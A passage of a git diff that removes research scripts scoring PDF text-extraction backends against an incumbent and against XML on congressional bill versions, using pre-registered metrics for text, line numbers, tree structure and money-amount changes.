t1, o1 = pdf_full_text(p1) - t2, o2 = pdf_full_text(p2) - c = pdf_diff_to_canonical( - diff_pdfs(p1, p2), - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": t1, "v2": t2}, - line_offsets={"v1": o1, "v2": o2}, - ) - canon[path] = {"amounts": amount_triples(c), "changes": change_signatures(c)} - except Exception as exc: # noqa: BLE001 - entry.setdefault("errors", {})[path] = f"{type(exc).__name__}: {exc}" - print(traceback.format_exc()[-800:], file=sys.stderr) - if "production" in canon: - ref = canon["production"] - entry["n_amount_entries_production"] = sum(ref["amounts"].values()) - entry["n_changes_production"] = sum(ref["changes"].values()) - entry["vs_production"] = {} - for path, c in canon.items(): - if path == "production": - continue - entry["vs_production"][path] = { - "H6_amounts_identical": c["amounts"] == ref["amounts"], - "H6_changes_identical": c["changes"] == ref["changes"], - "H6_amount_overlap": sum((c["amounts"] & ref["amounts"]).values()), - "H6_amounts_candidate": sum(c["amounts"].values()), - "H6_change_overlap": sum((c["changes"] & ref["changes"]).values()), - "H6_changes_candidate": sum(c["changes"].values()), - } - rows.append(entry) - marks = " ".join( - f"{p}: amt={'=' if r['H6_amounts_identical'] else 'x'} chg={'=' if r['H6_changes_identical'] else 'x'}" - for p, r in (entry.get("vs_production") or {}).items() - ) - print(f" [{i}/{len(pairs)}] {key:<30} {marks}", file=sys.stderr) - out_path.parent.mkdir(parents=True, exist_ok=True) - out_path.write_text(json.dumps({"pairs": rows}, indent=1)) - print(f"\nwrote {out_path}") - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--pairs", action="store_true", help="score H6 over version pairs instead of documents") - ap.add_argument("--limit", type=int, default=None) - args = ap.parse_args() - if args.pairs: - score_pairs(args.out, args.limit) - else: - score_documents(args.out, args.limit) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_migration.py b/docs/research/pdf-backend-bakeoff/probes/score_migration.py deleted file mode 100644 index 8e2f2751..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_migration.py +++ /dev/null @@ -1,224 +0,0 @@ -"""Concern A: production migration parity. The reference here IS the incumbent, by design. - -PRE-REGISTRATION-CONFIRMATORY.md, "Concern A -- production migration parity". - - A1 amount identity Counter[(old, new, kind)] equals native pypdfium2's, exactly - A2 change identity Counter[(change_type, norm(old), norm(new))] equals it, exactly - A3 amount F1 for when A1 fails - A4 full-text identity SHA-256 of pdf_full_text equals it - A5 line-number identity exact (page, line) set equals it - -Nothing here licenses an accuracy conclusion. Reproducing today's output exactly is -evidence about MIGRATION RISK; substituting it for "reads the document correctly" is the -error that produced the withdrawn headline. - -All 15 corpus pairs are always reported, in two strata. The 13 production accepts are the -migration gate. The 2 production declines are scored with the guard bypassed and reported -as unsupported-layout diagnostics -- they are not staffer-visible output and do not decide -whether a migration is safe. The 15/15 figure, if it holds, is named "backend equivalence -beyond supported production behavior", never production migration parity. - -Primary mode is `repaired`, the mode we would ship: a deterministic adapter normalizing a -known source-library quirk is part of the intended implementation, and production already -does the equivalent for the text API in normalize_raw. `strict` is reported as a diagnostic. - -SA1/SA2/SA3 are the controls. Each must FAIL its gate; a gate its own sabotage cannot fail -is void, and a candidate's pass on a void gate is not evidence of parity. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_migration.py \ - --population p1 --out docs/research/pdf-backend-bakeoff/results/migration_p1.json -""" - -from __future__ import annotations - -import argparse -import hashlib -import json -import sys -import time -import traceback -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_sabotage as SAB # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase2 import amount_triples, change_signatures, corpus_pairs, prf # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import pdf_diff_to_canonical # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -INCUMBENT = "pdfium-native" -CANDIDATES = ("pdfium-wasm", "pdfminer") -MODES = ("repaired", "strict") # repaired first: it is the primary - - -def holdout_pairs() -> list[tuple[str, int, int, Path, Path, Path, Path]]: - """The 32 consecutive-version holdout pairs named by the frozen membership. - - Same fail-loud reasoning as `score_confirmatory.p2_documents`: the holdout files are - fetched rather than committed, and skipping absent ones silently produced a zero-pair - run that still wrote a results file and exited 0. - """ - doc = json.loads((REPO / "docs/research/pdf-backend-bakeoff/results/holdout_membership.json").read_text()) - root = REPO / "docs/research/pdf-backend-bakeoff/holdout" - out, missing = [], [] - for m in doc["members"]: - vs = sorted(m["versions"], key=lambda v: v["index"]) - for a, b in zip(vs, vs[1:], strict=False): - d = root / m["bill_id"] - pa, pb = d / Path(a["pdf"]["path"]).name, d / Path(b["pdf"]["path"]).name - xa, xb = d / Path(a["xml"]["path"]).name, d / Path(b["xml"]["path"]).name - missing.extend(str(p.relative_to(root)) for p in (pa, pb, xa, xb) if not p.exists()) - out.append((m["bill_id"], a["index"], b["index"], pa, pb, xa, xb)) - if missing: - raise SystemExit( - f"{len(set(missing))} holdout files are missing, so the P2 pairs cannot be scored. " - f"Restore them first:\n" - f" .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py\n" - f"first missing: {', '.join(sorted(set(missing))[:4])}" - ) - return out - - -def canonical_from_pages(pages_v1, pages_v2, bill: str) -> dict: - congress, chamber, number = bill.split("-", 2) - diff = diff_pdfs(pages_v1, pages_v2) - t1, o1 = pdf_full_text(pages_v1) - t2, o2 = pdf_full_text(pages_v2) - return pdf_diff_to_canonical( - diff, - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": t1, "v2": t2}, - line_offsets={"v1": o1, "v2": o2}, - ) - - -def fingerprint(pages) -> dict: - text, _ = pdf_full_text(pages) - return { - "text_sha256": hashlib.sha256(text.encode()).hexdigest(), - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None - ), - } - - -def score_pair(raw_v1: dict, raw_v2: dict, bill: str, mode: str, names: list[str]) -> dict: - """Everything for one pair in one mode, incumbent first so it can be the reference.""" - out: dict = {} - ref_amounts = ref_sigs = ref_fp = None - for name in names: - if name not in raw_v1 or name not in raw_v2: - continue - try: - p1, _ = reconstruct(raw_v1[name], repaired=(mode == "repaired")) - p2, _ = reconstruct(raw_v2[name], repaired=(mode == "repaired")) - declined = [s for s, pg in (("v1", p1), ("v2", p2)) if _is_unnumbered_layout(pg)] - canon = canonical_from_pages(p1, p2, bill) - amounts, sigs = amount_triples(canon), change_signatures(canon) - fp = {"v1": fingerprint(p1), "v2": fingerprint(p2)} - entry: dict = { - "production_declined": declined, - "n_amount_entries": sum(amounts.values()), - "n_changes": sum(sigs.values()), - } - if name == INCUMBENT: - ref_amounts, ref_sigs, ref_fp = amounts, sigs, fp - else: - entry["A1_amounts_identical"] = amounts == ref_amounts - entry["A2_changes_identical"] = sigs == ref_sigs - entry["A3_amount_prf"] = prf(ref_amounts, amounts) - entry["A3_change_prf"] = prf(ref_sigs, sigs) - entry["A4_text_identical"] = all(fp[s]["text_sha256"] == ref_fp[s]["text_sha256"] for s in ("v1", "v2")) - entry["A5_line_numbers_identical"] = all( - fp[s]["line_numbers"] == ref_fp[s]["line_numbers"] for s in ("v1", "v2") - ) - out[name] = entry - except Exception as exc: - out[name] = {"error": f"{type(exc).__name__}: {exc}", "traceback": traceback.format_exc()[-600:]} - return out - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--population", choices=("p1", "p2"), required=True) - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--limit", type=int, default=None) - args = ap.parse_args() - - pairs = corpus_pairs() if args.population == "p1" else holdout_pairs() - if args.limit: - pairs = pairs[: args.limit] - print(f"population {args.population}: {len(pairs)} consecutive pairs", file=sys.stderr) - - out: dict = { - "population": args.population, - "n_pairs": len(pairs), - "incumbent": INCUMBENT, - "candidates": list(CANDIDATES), - "primary_mode": "repaired", - "seed": SAB.SEED, - "pairs": {}, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, a, b, pdf1, pdf2, _x1, _x2) in enumerate(pairs, 1): - key = f"{bill}/{a}->{b}" - t0 = time.perf_counter() - raw_v1: dict = {} - raw_v2: dict = {} - for name in (INCUMBENT,) + CANDIDATES: - try: - raw_v1[name] = run_backend(name, pdf1)[0] - raw_v2[name] = run_backend(name, pdf2)[0] - except Exception as exc: - print(f" {name} extract error: {exc}", file=sys.stderr) - - # Controls derive from the candidate, on the NEW side only: a migration gate has to - # catch a fault introduced by the replacement backend. - if "pdfium-wasm" in raw_v2: - for sid, (fn, _gate) in SAB.A_SABOTAGES.items(): - try: - raw_v1[sid] = raw_v1["pdfium-wasm"] - raw_v2[sid] = fn(raw_v2["pdfium-wasm"]) - except Exception as exc: - print(f" {sid} sabotage error: {exc}", file=sys.stderr) - - names = [INCUMBENT, *CANDIDATES, *SAB.A_SABOTAGES] - entry = {"bill": bill, "v1": a, "v2": b} - for mode in MODES: - entry[mode] = score_pair(raw_v1, raw_v2, bill, mode, names) - entry["elapsed_s"] = round(time.perf_counter() - t0, 2) - out["pairs"][key] = entry - args.out.write_text(json.dumps(out, indent=1, default=str)) - - prim = entry["repaired"] - flags = " ".join( - f"{n}:{'A1' if prim.get(n, {}).get('A1_amounts_identical') else 'a1'}" - f"{'A2' if prim.get(n, {}).get('A2_changes_identical') else 'a2'}" - for n in CANDIDATES - if n in prim - ) - dec = prim.get(INCUMBENT, {}).get("production_declined") or [] - print( - f" [{i}/{len(pairs)}] {key:<26} {entry['elapsed_s']:>6.1f}s " - f"{'DECLINED ' + '+'.join(dec) if dec else 'accepted'} {flags}", - file=sys.stderr, - ) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_phase1.py b/docs/research/pdf-backend-bakeoff/probes/score_phase1.py deleted file mode 100644 index aa1e09d8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_phase1.py +++ /dev/null @@ -1,425 +0,0 @@ -"""Phase 1: per-document scoring of every backend through the neutral layer (N=52). - -Implements metrics M1-M5 exactly as PRE-REGISTRATION.md defines them. Every backend is -scored on output of the ONE neutral reconstruction layer, so what is measured is -glyph-fact quality, not a library's own text assembly. - -The calibration gate (Trap 1) runs first and is reported first: PDFium's glyph facts go -through the same layer, and if the incumbent does not land near ceiling, no other number -here means anything. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_phase1.py \ - --out docs/research/pdf-backend-bakeoff/results/phase1.json [--limit-docs N] -""" - -from __future__ import annotations - -import argparse -import difflib -import json -import re -import statistics -import sys -import time -import traceback -import xml.etree.ElementTree as ET -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, CP, FONT, X0, run_backend # noqa: E402 -from reconstruct import cluster_lines, reconstruct # noqa: E402 - -from deltatrack.bill_tree import extract_text_content, find_bill_bodies # noqa: E402 -from deltatrack.formatters.canonical import _pdf_tree_payload # noqa: E402 -from deltatrack.parsers.pdf_anchors import breadcrumb_for, extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import normalize_glyphs, pdf_full_text # noqa: E402 - -_WORD = re.compile(r"\S+") - - -# ---------- M1: text recovery ------------------------------------------------ - - -def normalize_for_text_compare(text: str) -> list[str]: - """Token stream both sides are reduced to before comparison. - - Case is preserved (GPO small-caps headings carry real meaning), whitespace is - collapsed, and `normalize_glyphs` maps the typographic forms the PDF carries and the - XML does not. Everything removed here is listed as non-material in the - pre-registration, so the metric cannot be inflated by widening this function later. - """ - text = normalize_glyphs(text) - text = text.replace("­", "").replace("�", "") - return _WORD.findall(text) - - -_MIN_ANCHOR_BLOCK = 4 -# Alignment only ever trims the ends, so it only ever needs to look at the ends. A GPO -# cover page runs a few hundred tokens; these windows are an order of magnitude larger. -# Bounding them keeps `difflib`'s quadratic matcher off the 180k-token enrolled bills, -# where an unbounded call takes many minutes per document per backend. -_ALIGN_WINDOW_PDF = 4000 -_ALIGN_WINDOW_XML = 1500 -# Ceiling on the aligned candidate length for the order-sensitive cross-check. Above -# this, difflib's quadratic matcher costs more than the audit is worth. -_LCS_CROSS_CHECK_MAX = 25000 - - -def align_to_body(reference: list[str], candidate: list[str]) -> tuple[list[str], dict]: - """Trim the PDF's leading and trailing non-body matter before scoring. - - THE ALIGNMENT STEP Trap 1 demands, and it is frozen here before any challenger is - scored. A GPO PDF prints a cover page (chamber, congress, session, sponsors, referral - history, calendar number) and often a signature block; `find_bill_bodies` returns - none of that. Unaligned, those tokens are counted as PDF false positives, which is - noise on a 94-page bill (precision 0.93) and catastrophic on a 1-page stub - (precision 0.21) -- so the ranking would be driven by document length rather than by - backend quality. - - The rule trims EDGES ONLY: find the first and last matching blocks of at least - `_MIN_ANCHOR_BLOCK` tokens and keep the candidate span between them. Interior - material is untouched, so a backend that drops, duplicates or garbles body text is - still fully penalised. That asymmetry is the point -- alignment must not be able to - hide the defects the bake-off exists to find. - """ - head_sm = difflib.SequenceMatcher(a=reference[:_ALIGN_WINDOW_XML], b=candidate[:_ALIGN_WINDOW_PDF], autojunk=False) - head_blocks = [b for b in head_sm.get_matching_blocks() if b.size >= _MIN_ANCHOR_BLOCK] - start = head_blocks[0].b if head_blocks else 0 - - tail_sm = difflib.SequenceMatcher( - a=reference[-_ALIGN_WINDOW_XML:], b=candidate[-_ALIGN_WINDOW_PDF:], autojunk=False - ) - tail_blocks = [b for b in tail_sm.get_matching_blocks() if b.size >= _MIN_ANCHOR_BLOCK] - if tail_blocks: - last = tail_blocks[-1] - offset = max(0, len(candidate) - _ALIGN_WINDOW_PDF) - end = offset + last.b + last.size - else: - end = len(candidate) - - if end <= start: # degenerate; keep everything rather than invent a span - return candidate, {"aligned": False, "trimmed_head": 0, "trimmed_tail": 0} - return candidate[start:end], { - "aligned": bool(head_blocks or tail_blocks), - "trimmed_head": start, - "trimmed_tail": len(candidate) - end, - } - - -def token_f1(reference: list[str], candidate: list[str]) -> dict: - """Token-level precision/recall/F1 by MULTISET intersection. - - Tokens rather than characters: character similarity on a bill is dominated by - whitespace and flatters every backend into the high nineties. - - Multiset rather than longest-common-subsequence, for two reasons. The practical one - is cost: `difflib` is quadratic and the enrolled bills run to ~180k tokens, which is - minutes per document per backend per mode, i.e. days for the full matrix. The - principled one is that PDF-vs-XML *ordering* differences are expected by design -- - the two are different artifacts of one bill version, not two attempts at one artifact - -- so penalising reordering would measure the format gap rather than the backend. - - A multiset still penalises every defect this bake-off is looking for: a dropped - token, a duplicated token, a garbled token and a hallucinated token all move the - score. Only pure reordering is invisible, and that is deliberate. - - AMENDMENT, recorded rather than quietly applied: PRE-REGISTRATION.md specified - "token-level F1" without naming the algorithm, and the first implementation used - LCS. The switch was made after seeing the runtime, not the ranking. See - `--cross-check-lcs`, which recomputes both on documents small enough to afford it and - reports the delta, so the substitution can be audited rather than trusted. - """ - if not reference and not candidate: - return {"precision": 1.0, "recall": 1.0, "f1": 1.0, "matched": 0} - ref = Counter(reference) - cand = Counter(candidate) - matched = sum((ref & cand).values()) - precision = matched / len(candidate) if candidate else 0.0 - recall = matched / len(reference) if reference else 0.0 - f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0 - return { - "precision": round(precision, 5), - "recall": round(recall, 5), - "f1": round(f1, 5), - "matched": matched, - } - - -def token_f1_lcs(reference: list[str], candidate: list[str]) -> dict: - """Order-sensitive F1, for the cross-check only. Quadratic; small documents only.""" - if not reference and not candidate: - return {"precision": 1.0, "recall": 1.0, "f1": 1.0, "matched": 0} - sm = difflib.SequenceMatcher(a=reference, b=candidate, autojunk=False) - matched = sum(block.size for block in sm.get_matching_blocks()) - precision = matched / len(candidate) if candidate else 0.0 - recall = matched / len(reference) if reference else 0.0 - f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0 - return { - "precision": round(precision, 5), - "recall": round(recall, 5), - "f1": round(f1, 5), - "matched": matched, - } - - -def xml_body_tokens(xml_path: Path) -> list[str]: - root = ET.parse(xml_path).getroot() - bodies = find_bill_bodies(root) - return normalize_for_text_compare("\n".join(extract_text_content(b) for b in bodies)) - - -# ---------- M2: line-number recovery ----------------------------------------- - - -def line_number_set(pages) -> set[tuple[int, int]]: - return {(p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None} - - -def line_number_scores(reference: set, candidate: set) -> dict: - if not reference: - return {"recall": None, "spurious_rate": None, "n_reference": 0} - hit = len(reference & candidate) - extra = len(candidate - reference) - return { - "recall": round(hit / len(reference), 5), - "spurious_rate": round(extra / len(reference), 5), - "n_reference": len(reference), - "n_candidate": len(candidate), - } - - -# ---------- M3 / M4: tree, conservation, breadcrumbs -------------------------- - -_AMOUNT = re.compile(r"\$[\d,]+(?:\.\d+)?") - - -def tree_scores(pages) -> dict: - """Heading-tree shape plus the ADR 0014 money-conservation invariant. - - Conservation is measured the way the corpus gate measures it for PDF: the union of - per-node `own_amounts` against the amounts present in the document's own full_text. - PDF has no independent ground truth for this, which the corpus gate documents as a - weaker carve-out; it is reported here on the same terms. - """ - anchors = extract_anchors(pages) - text, offsets = pdf_full_text(pages) - nodes = _pdf_tree_payload(tuple(anchors), offsets, text) - - flat: list[dict] = [] - stack = list(nodes) - while stack: - node = stack.pop() - flat.append(node) - stack.extend(node.get("children") or []) - - own: Counter = Counter() - for node in flat: - for amount in node.get("own_amounts") or []: - own[amount] += 1 - in_text = Counter(_AMOUNT.findall(text)) - over = sum(max(0, c - in_text.get(a, 0)) for a, c in own.items()) - dropped = sum(max(0, c - own.get(a, 0)) for a, c in in_text.items()) - - crumbs = [breadcrumb_for(a, anchors) for a in anchors] - return { - "n_anchors": len(anchors), - "n_nodes": len(flat), - "levels": dict(Counter(n.get("level") for n in flat)), - "conservation_overcount": over, - "conservation_dropped": dropped, - "conservation_holds": over == 0, - "breadcrumbs": crumbs, - } - - -def breadcrumb_agreement(reference: list, candidate: list) -> dict: - if not reference: - return {"agreement": None, "n_reference": 0} - ref = Counter(tuple(c) for c in reference) - cand = Counter(tuple(c) for c in candidate) - shared = sum((ref & cand).values()) - return { - "agreement": round(shared / sum(ref.values()), 5), - "n_reference": sum(ref.values()), - "n_candidate": sum(cand.values()), - } - - -# ---------- M5: font-role separation ----------------------------------------- - - -def font_role_scores(raw_pages) -> dict: - """Can this backend separate the margin line-number from the body by FONT? - - Scored as role separation, never name-string equality: the source-signal inventory - records bodies as `DeVinne` in bills but `NewCenturySchlbk` in enrolled, - engrossed-amendment-senate and committee prints, so a name test would be measuring - print class rather than backend capability. - - The margin glyph is identified positionally (leftmost run of digits on a line whose - reconstruction starts with a margin number), which is independent of font, so the - metric cannot be circular. - """ - separated = 0 - total = 0 - empty_font = 0 - all_glyphs = 0 - for page in raw_pages: - for row in cluster_lines(page): - ordered = sorted(row, key=lambda g: g[X0]) - all_glyphs += len(ordered) - empty_font += sum(1 for g in ordered if not g[FONT]) - digits: list = [] - for g in ordered: - if 0x30 <= g[CP] <= 0x39: - digits.append(g) - else: - break - if not digits or len(digits) > 2 or len(ordered) <= len(digits): - continue - body = ordered[len(digits) :] - body_fonts = [g[FONT] for g in body if g[CP] != 32 and g[FONT]] - margin_fonts = [g[FONT] for g in digits if g[FONT]] - if not body_fonts or not margin_fonts: - continue - total += 1 - if statistics.mode(margin_fonts) != statistics.mode(body_fonts): - separated += 1 - return { - "margin_vs_body_separation": round(separated / total, 5) if total else None, - "n_numbered_lines_scored": total, - "empty_font_name_rate": round(empty_font / all_glyphs, 5) if all_glyphs else None, - "n_glyphs": all_glyphs, - } - - -# ---------- driver ------------------------------------------------------------ - - -def corpus_documents() -> list[tuple[str, int, Path, Path]]: - """Every corpus version carrying BOTH formats, derived not enumerated (ADR 0015).""" - out = [] - for d in sorted((REPO / "tests" / "corpus").iterdir()): - if not d.is_dir(): - continue - stems: dict[int, dict[str, Path]] = {} - for f in d.iterdir(): - m = re.match(r"(\d+)_([a-z-]+)\.(pdf|xml)$", f.name) - if m: - stems.setdefault(int(m.group(1)), {})[m.group(3)] = f - for n, formats in sorted(stems.items()): - if {"pdf", "xml"} <= formats.keys(): - out.append((d.name, n, formats["pdf"], formats["xml"])) - return out - - -def score_document( - backend: str, pdf: Path, xml: Path, reference: dict | None, cross_check_lcs: bool = False -) -> dict: - t0 = time.perf_counter() - raw_pages, summary = run_backend(backend, pdf) - extract_s = time.perf_counter() - t0 - - result: dict = { - "backend": backend, - "extract_s": round(extract_s, 3), - "backend_summary": summary, - "font_role": font_role_scores(raw_pages), - } - - xml_tokens = xml_body_tokens(xml) - for mode in ("strict", "repaired"): - pages, diag = reconstruct(raw_pages, repaired=(mode == "repaired")) - tokens = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, align_info = align_to_body(xml_tokens, tokens) - tree = tree_scores(pages) - entry = { - "reconstruction": diag, - "alignment": align_info, - "text_vs_xml": token_f1(xml_tokens, aligned), - "text_vs_xml_unaligned": token_f1(xml_tokens, tokens), - "text_vs_xml_lcs": ( - token_f1_lcs(xml_tokens, aligned) if cross_check_lcs and len(aligned) <= _LCS_CROSS_CHECK_MAX else None - ), - "line_numbers": line_number_scores( - reference[mode]["line_number_set"] if reference else line_number_set(pages), - line_number_set(pages), - ), - "tree": {k: v for k, v in tree.items() if k != "breadcrumbs"}, - "breadcrumbs": breadcrumb_agreement( - reference[mode]["breadcrumbs"] if reference else tree["breadcrumbs"], - tree["breadcrumbs"], - ), - "n_pages": len(pages), - } - result[mode] = entry - # The incumbent run also publishes the reference sets the challengers score - # against for the no-regression gates (2 and 3). - result.setdefault("_reference", {})[mode] = { - "line_number_set": line_number_set(pages), - "breadcrumbs": tree["breadcrumbs"], - } - return result - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument("--backends", default=",".join(ALL_BACKENDS)) - ap.add_argument( - "--cross-check-lcs", - action="store_true", - help="also compute the order-sensitive LCS F1 where affordable, to audit the " - "multiset substitution recorded in token_f1's docstring", - ) - args = ap.parse_args() - - backends = args.backends.split(",") - if backends[0] != "pdfium-native": - # The incumbent must run first: it is both the calibration gate and the reference - # for the no-regression gates. - backends = ["pdfium-native"] + [b for b in backends if b != "pdfium-native"] - - docs = corpus_documents() - if args.limit_docs: - docs = docs[: args.limit_docs] - print(f"scoring {len(docs)} documents x {len(backends)} backends", file=sys.stderr) - - out: dict = {"documents": {}, "n_documents": len(docs), "backends": backends} - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - out["documents"][key] = {} - reference = None - for backend in backends: - try: - res = score_document(backend, pdf, xml, reference, args.cross_check_lcs) - if backend == "pdfium-native": - reference = res.pop("_reference") - else: - res.pop("_reference", None) - out["documents"][key][backend] = res - mark = f"f1={res['strict']['text_vs_xml']['f1']:.3f}/{res['repaired']['text_vs_xml']['f1']:.3f}" - except Exception as exc: # a crash is a gate-1 failure, recorded not hidden - out["documents"][key][backend] = { - "error": f"{type(exc).__name__}: {exc}", - "traceback": traceback.format_exc()[-1500:], - } - mark = "ERROR" - print(f" [{i}/{len(docs)}] {key:<28} {backend:<14} {mark}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_phase2.py b/docs/research/pdf-backend-bakeoff/probes/score_phase2.py deleted file mode 100644 index c912db3a..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_phase2.py +++ /dev/null @@ -1,329 +0,0 @@ -"""Phase 2: the terminal metric -- PDF-derived diff vs XML-derived diff (N=15 pairs). - -This is the product. A backend that wins Phase 1 and loses here loses, because the diff -is what a staffer reads. - -Both pipelines converge on the canonical JSON contract (ADR 0006), so this is a -structured comparison rather than a text one. Three families of measurement, reported -separately and never merged into one number: - - T1 change-set agreement, PDF vs XML - T2 amount_entries agreement, PDF vs XML <- the highest-consequence field - T4 backend vs incumbent, PDF side only - -T4 is an ADDITION to the spec, and it is the sharpest instrument here. T1/T2 compare two -different artifacts of one bill version, so their disagreement mixes three causes the -metric cannot separate (Trap 2). T4 holds the entire downstream pipeline fixed and varies -only the glyph source, so ANY difference is attributable to the backend with no -adjudication required. It answers the question a delivery decision actually turns on: -would swapping the PDF backend change what a staffer sees? - -Comparisons are STRUCTURE-FREE by design. PDF-vs-XML output parity is settled-impossible -(the two segment provisions differently -- blocks vs elements), so a differing `modified` -count is not a defect and is reported as context, never as an error. What is comparable -is content: the multiset of money transitions, and the bag of changed text. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_phase2.py \ - --out docs/research/pdf-backend-bakeoff/results/phase2.json -""" - -from __future__ import annotations - -import argparse -import json -import re -import sys -import time -import traceback -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 - -from deltatrack.bill_tree import normalize_bill # noqa: E402 -from deltatrack.compare.pdf import UnsupportedLayoutError, _is_unnumbered_layout # noqa: E402 -from deltatrack.diff_bill import bill_diff_to_dict, diff_bills # noqa: E402 -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import ( # noqa: E402 - pdf_diff_to_canonical, - xml_diff_to_canonical, -) -from deltatrack.formatters.text_serializer import build_xml_full_text # noqa: E402 -from deltatrack.parsers.pdf_text import normalize_glyphs, pdf_full_text # noqa: E402 - -_WORD = re.compile(r"\S+") -_AMOUNT_TOKEN = re.compile(r"\$[\d,]+(?:\.\d+)?") -# Materiality floor from PRE-REGISTRATION.md clause (c). -_MATERIAL_MIN_CHARS = 20 -_SECTION_ID = re.compile(r"\b(?:SEC|SECTION|TITLE|DIVISION)\b\.?\s*[\dIVXLC]+", re.IGNORECASE) - - -def norm_text(text: str | None) -> str: - """Typographic normalization, exactly the set PRE-REGISTRATION.md declares non-material. - - Deliberately narrow. Widening it later would inflate agreement, so every rule here - corresponds to a named non-material class: whitespace runs, the glyph mappings - `normalize_glyphs` performs, soft hyphens, GPO margin line numbers, and the - letter-spacing GPO applies inside small-caps headings. - """ - if not text: - return "" - text = normalize_glyphs(text) - text = text.replace("­", "").replace("�", "") - text = re.sub(r"^\s*\d{1,2}\s", " ", text, flags=re.MULTILINE) - return " ".join(_WORD.findall(text)) - - -def prf(reference: Counter, candidate: Counter) -> dict: - matched = sum((reference & candidate).values()) - n_ref = sum(reference.values()) - n_cand = sum(candidate.values()) - precision = matched / n_cand if n_cand else (1.0 if not n_ref else 0.0) - recall = matched / n_ref if n_ref else (1.0 if not n_cand else 0.0) - f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0 - return { - "precision": round(precision, 5), - "recall": round(recall, 5), - "f1": round(f1, 5), - "matched": matched, - "n_reference": n_ref, - "n_candidate": n_cand, - } - - -# ---------- structure-free views of a canonical diff -------------------------- - - -def amount_triples(canonical: dict) -> Counter: - """Multiset of (old, new, kind) money transitions across the whole diff. - - The strongest available oracle for this comparison: money is the highest-consequence - field, and a transition carries no structural coordinates, so it survives the fact - that the two pipelines segment provisions differently. - """ - out: Counter = Counter() - for change in canonical.get("changes") or []: - for entry in change.get("amount_entries") or []: - out[(entry.get("old"), entry.get("new"), entry.get("kind"))] += 1 - return out - - -def changed_text_tokens(canonical: dict) -> tuple[Counter, Counter]: - """Bag of tokens appearing on each side of every change. - - Structure-free counterpart to change matching: it asks "did the two pipelines flag - the same words as having changed", without requiring them to package those words into - the same number of changes. - """ - old: Counter = Counter() - new: Counter = Counter() - for change in canonical.get("changes") or []: - text = change.get("text") or {} - old.update(_WORD.findall(norm_text(text.get("old")))) - new.update(_WORD.findall(norm_text(text.get("new")))) - return old, new - - -def change_signatures(canonical: dict) -> Counter: - """Multiset of (change_type, normalized old, normalized new) per the pre-registration.""" - return Counter( - ( - change.get("change_type"), - norm_text((change.get("text") or {}).get("old")), - norm_text((change.get("text") or {}).get("new")), - ) - for change in canonical.get("changes") or [] - ) - - -def is_material(signature: tuple) -> bool: - """PRE-REGISTRATION.md clause (c): whole-change presence, above a content floor.""" - _kind, old, new = signature - blob = f"{old} {new}" - if _AMOUNT_TOKEN.search(blob) or _SECTION_ID.search(blob): - return True - return len(blob.replace(" ", "")) >= _MATERIAL_MIN_CHARS - - -# ---------- pipeline drivers -------------------------------------------------- - - -def xml_canonical(v1_xml: Path, v2_xml: Path) -> dict: - v1, v2 = normalize_bill(v1_xml), normalize_bill(v2_xml) - diff_dict = bill_diff_to_dict(diff_bills(v1, v2), financial=True) - full_text, spans, tree = build_xml_full_text(v1, v2) - return xml_diff_to_canonical(diff_dict, full_text=full_text, full_text_spans=spans, tree=tree) - - -def pdf_canonical(backend: str, v1_pdf: Path, v2_pdf: Path, bill: str, mode: str) -> tuple[dict, dict]: - congress, chamber, number = bill.split("-") - timings = {} - pages = {} - for side, path in (("v1", v1_pdf), ("v2", v2_pdf)): - t0 = time.perf_counter() - raw, _summary = run_backend(backend, path) - 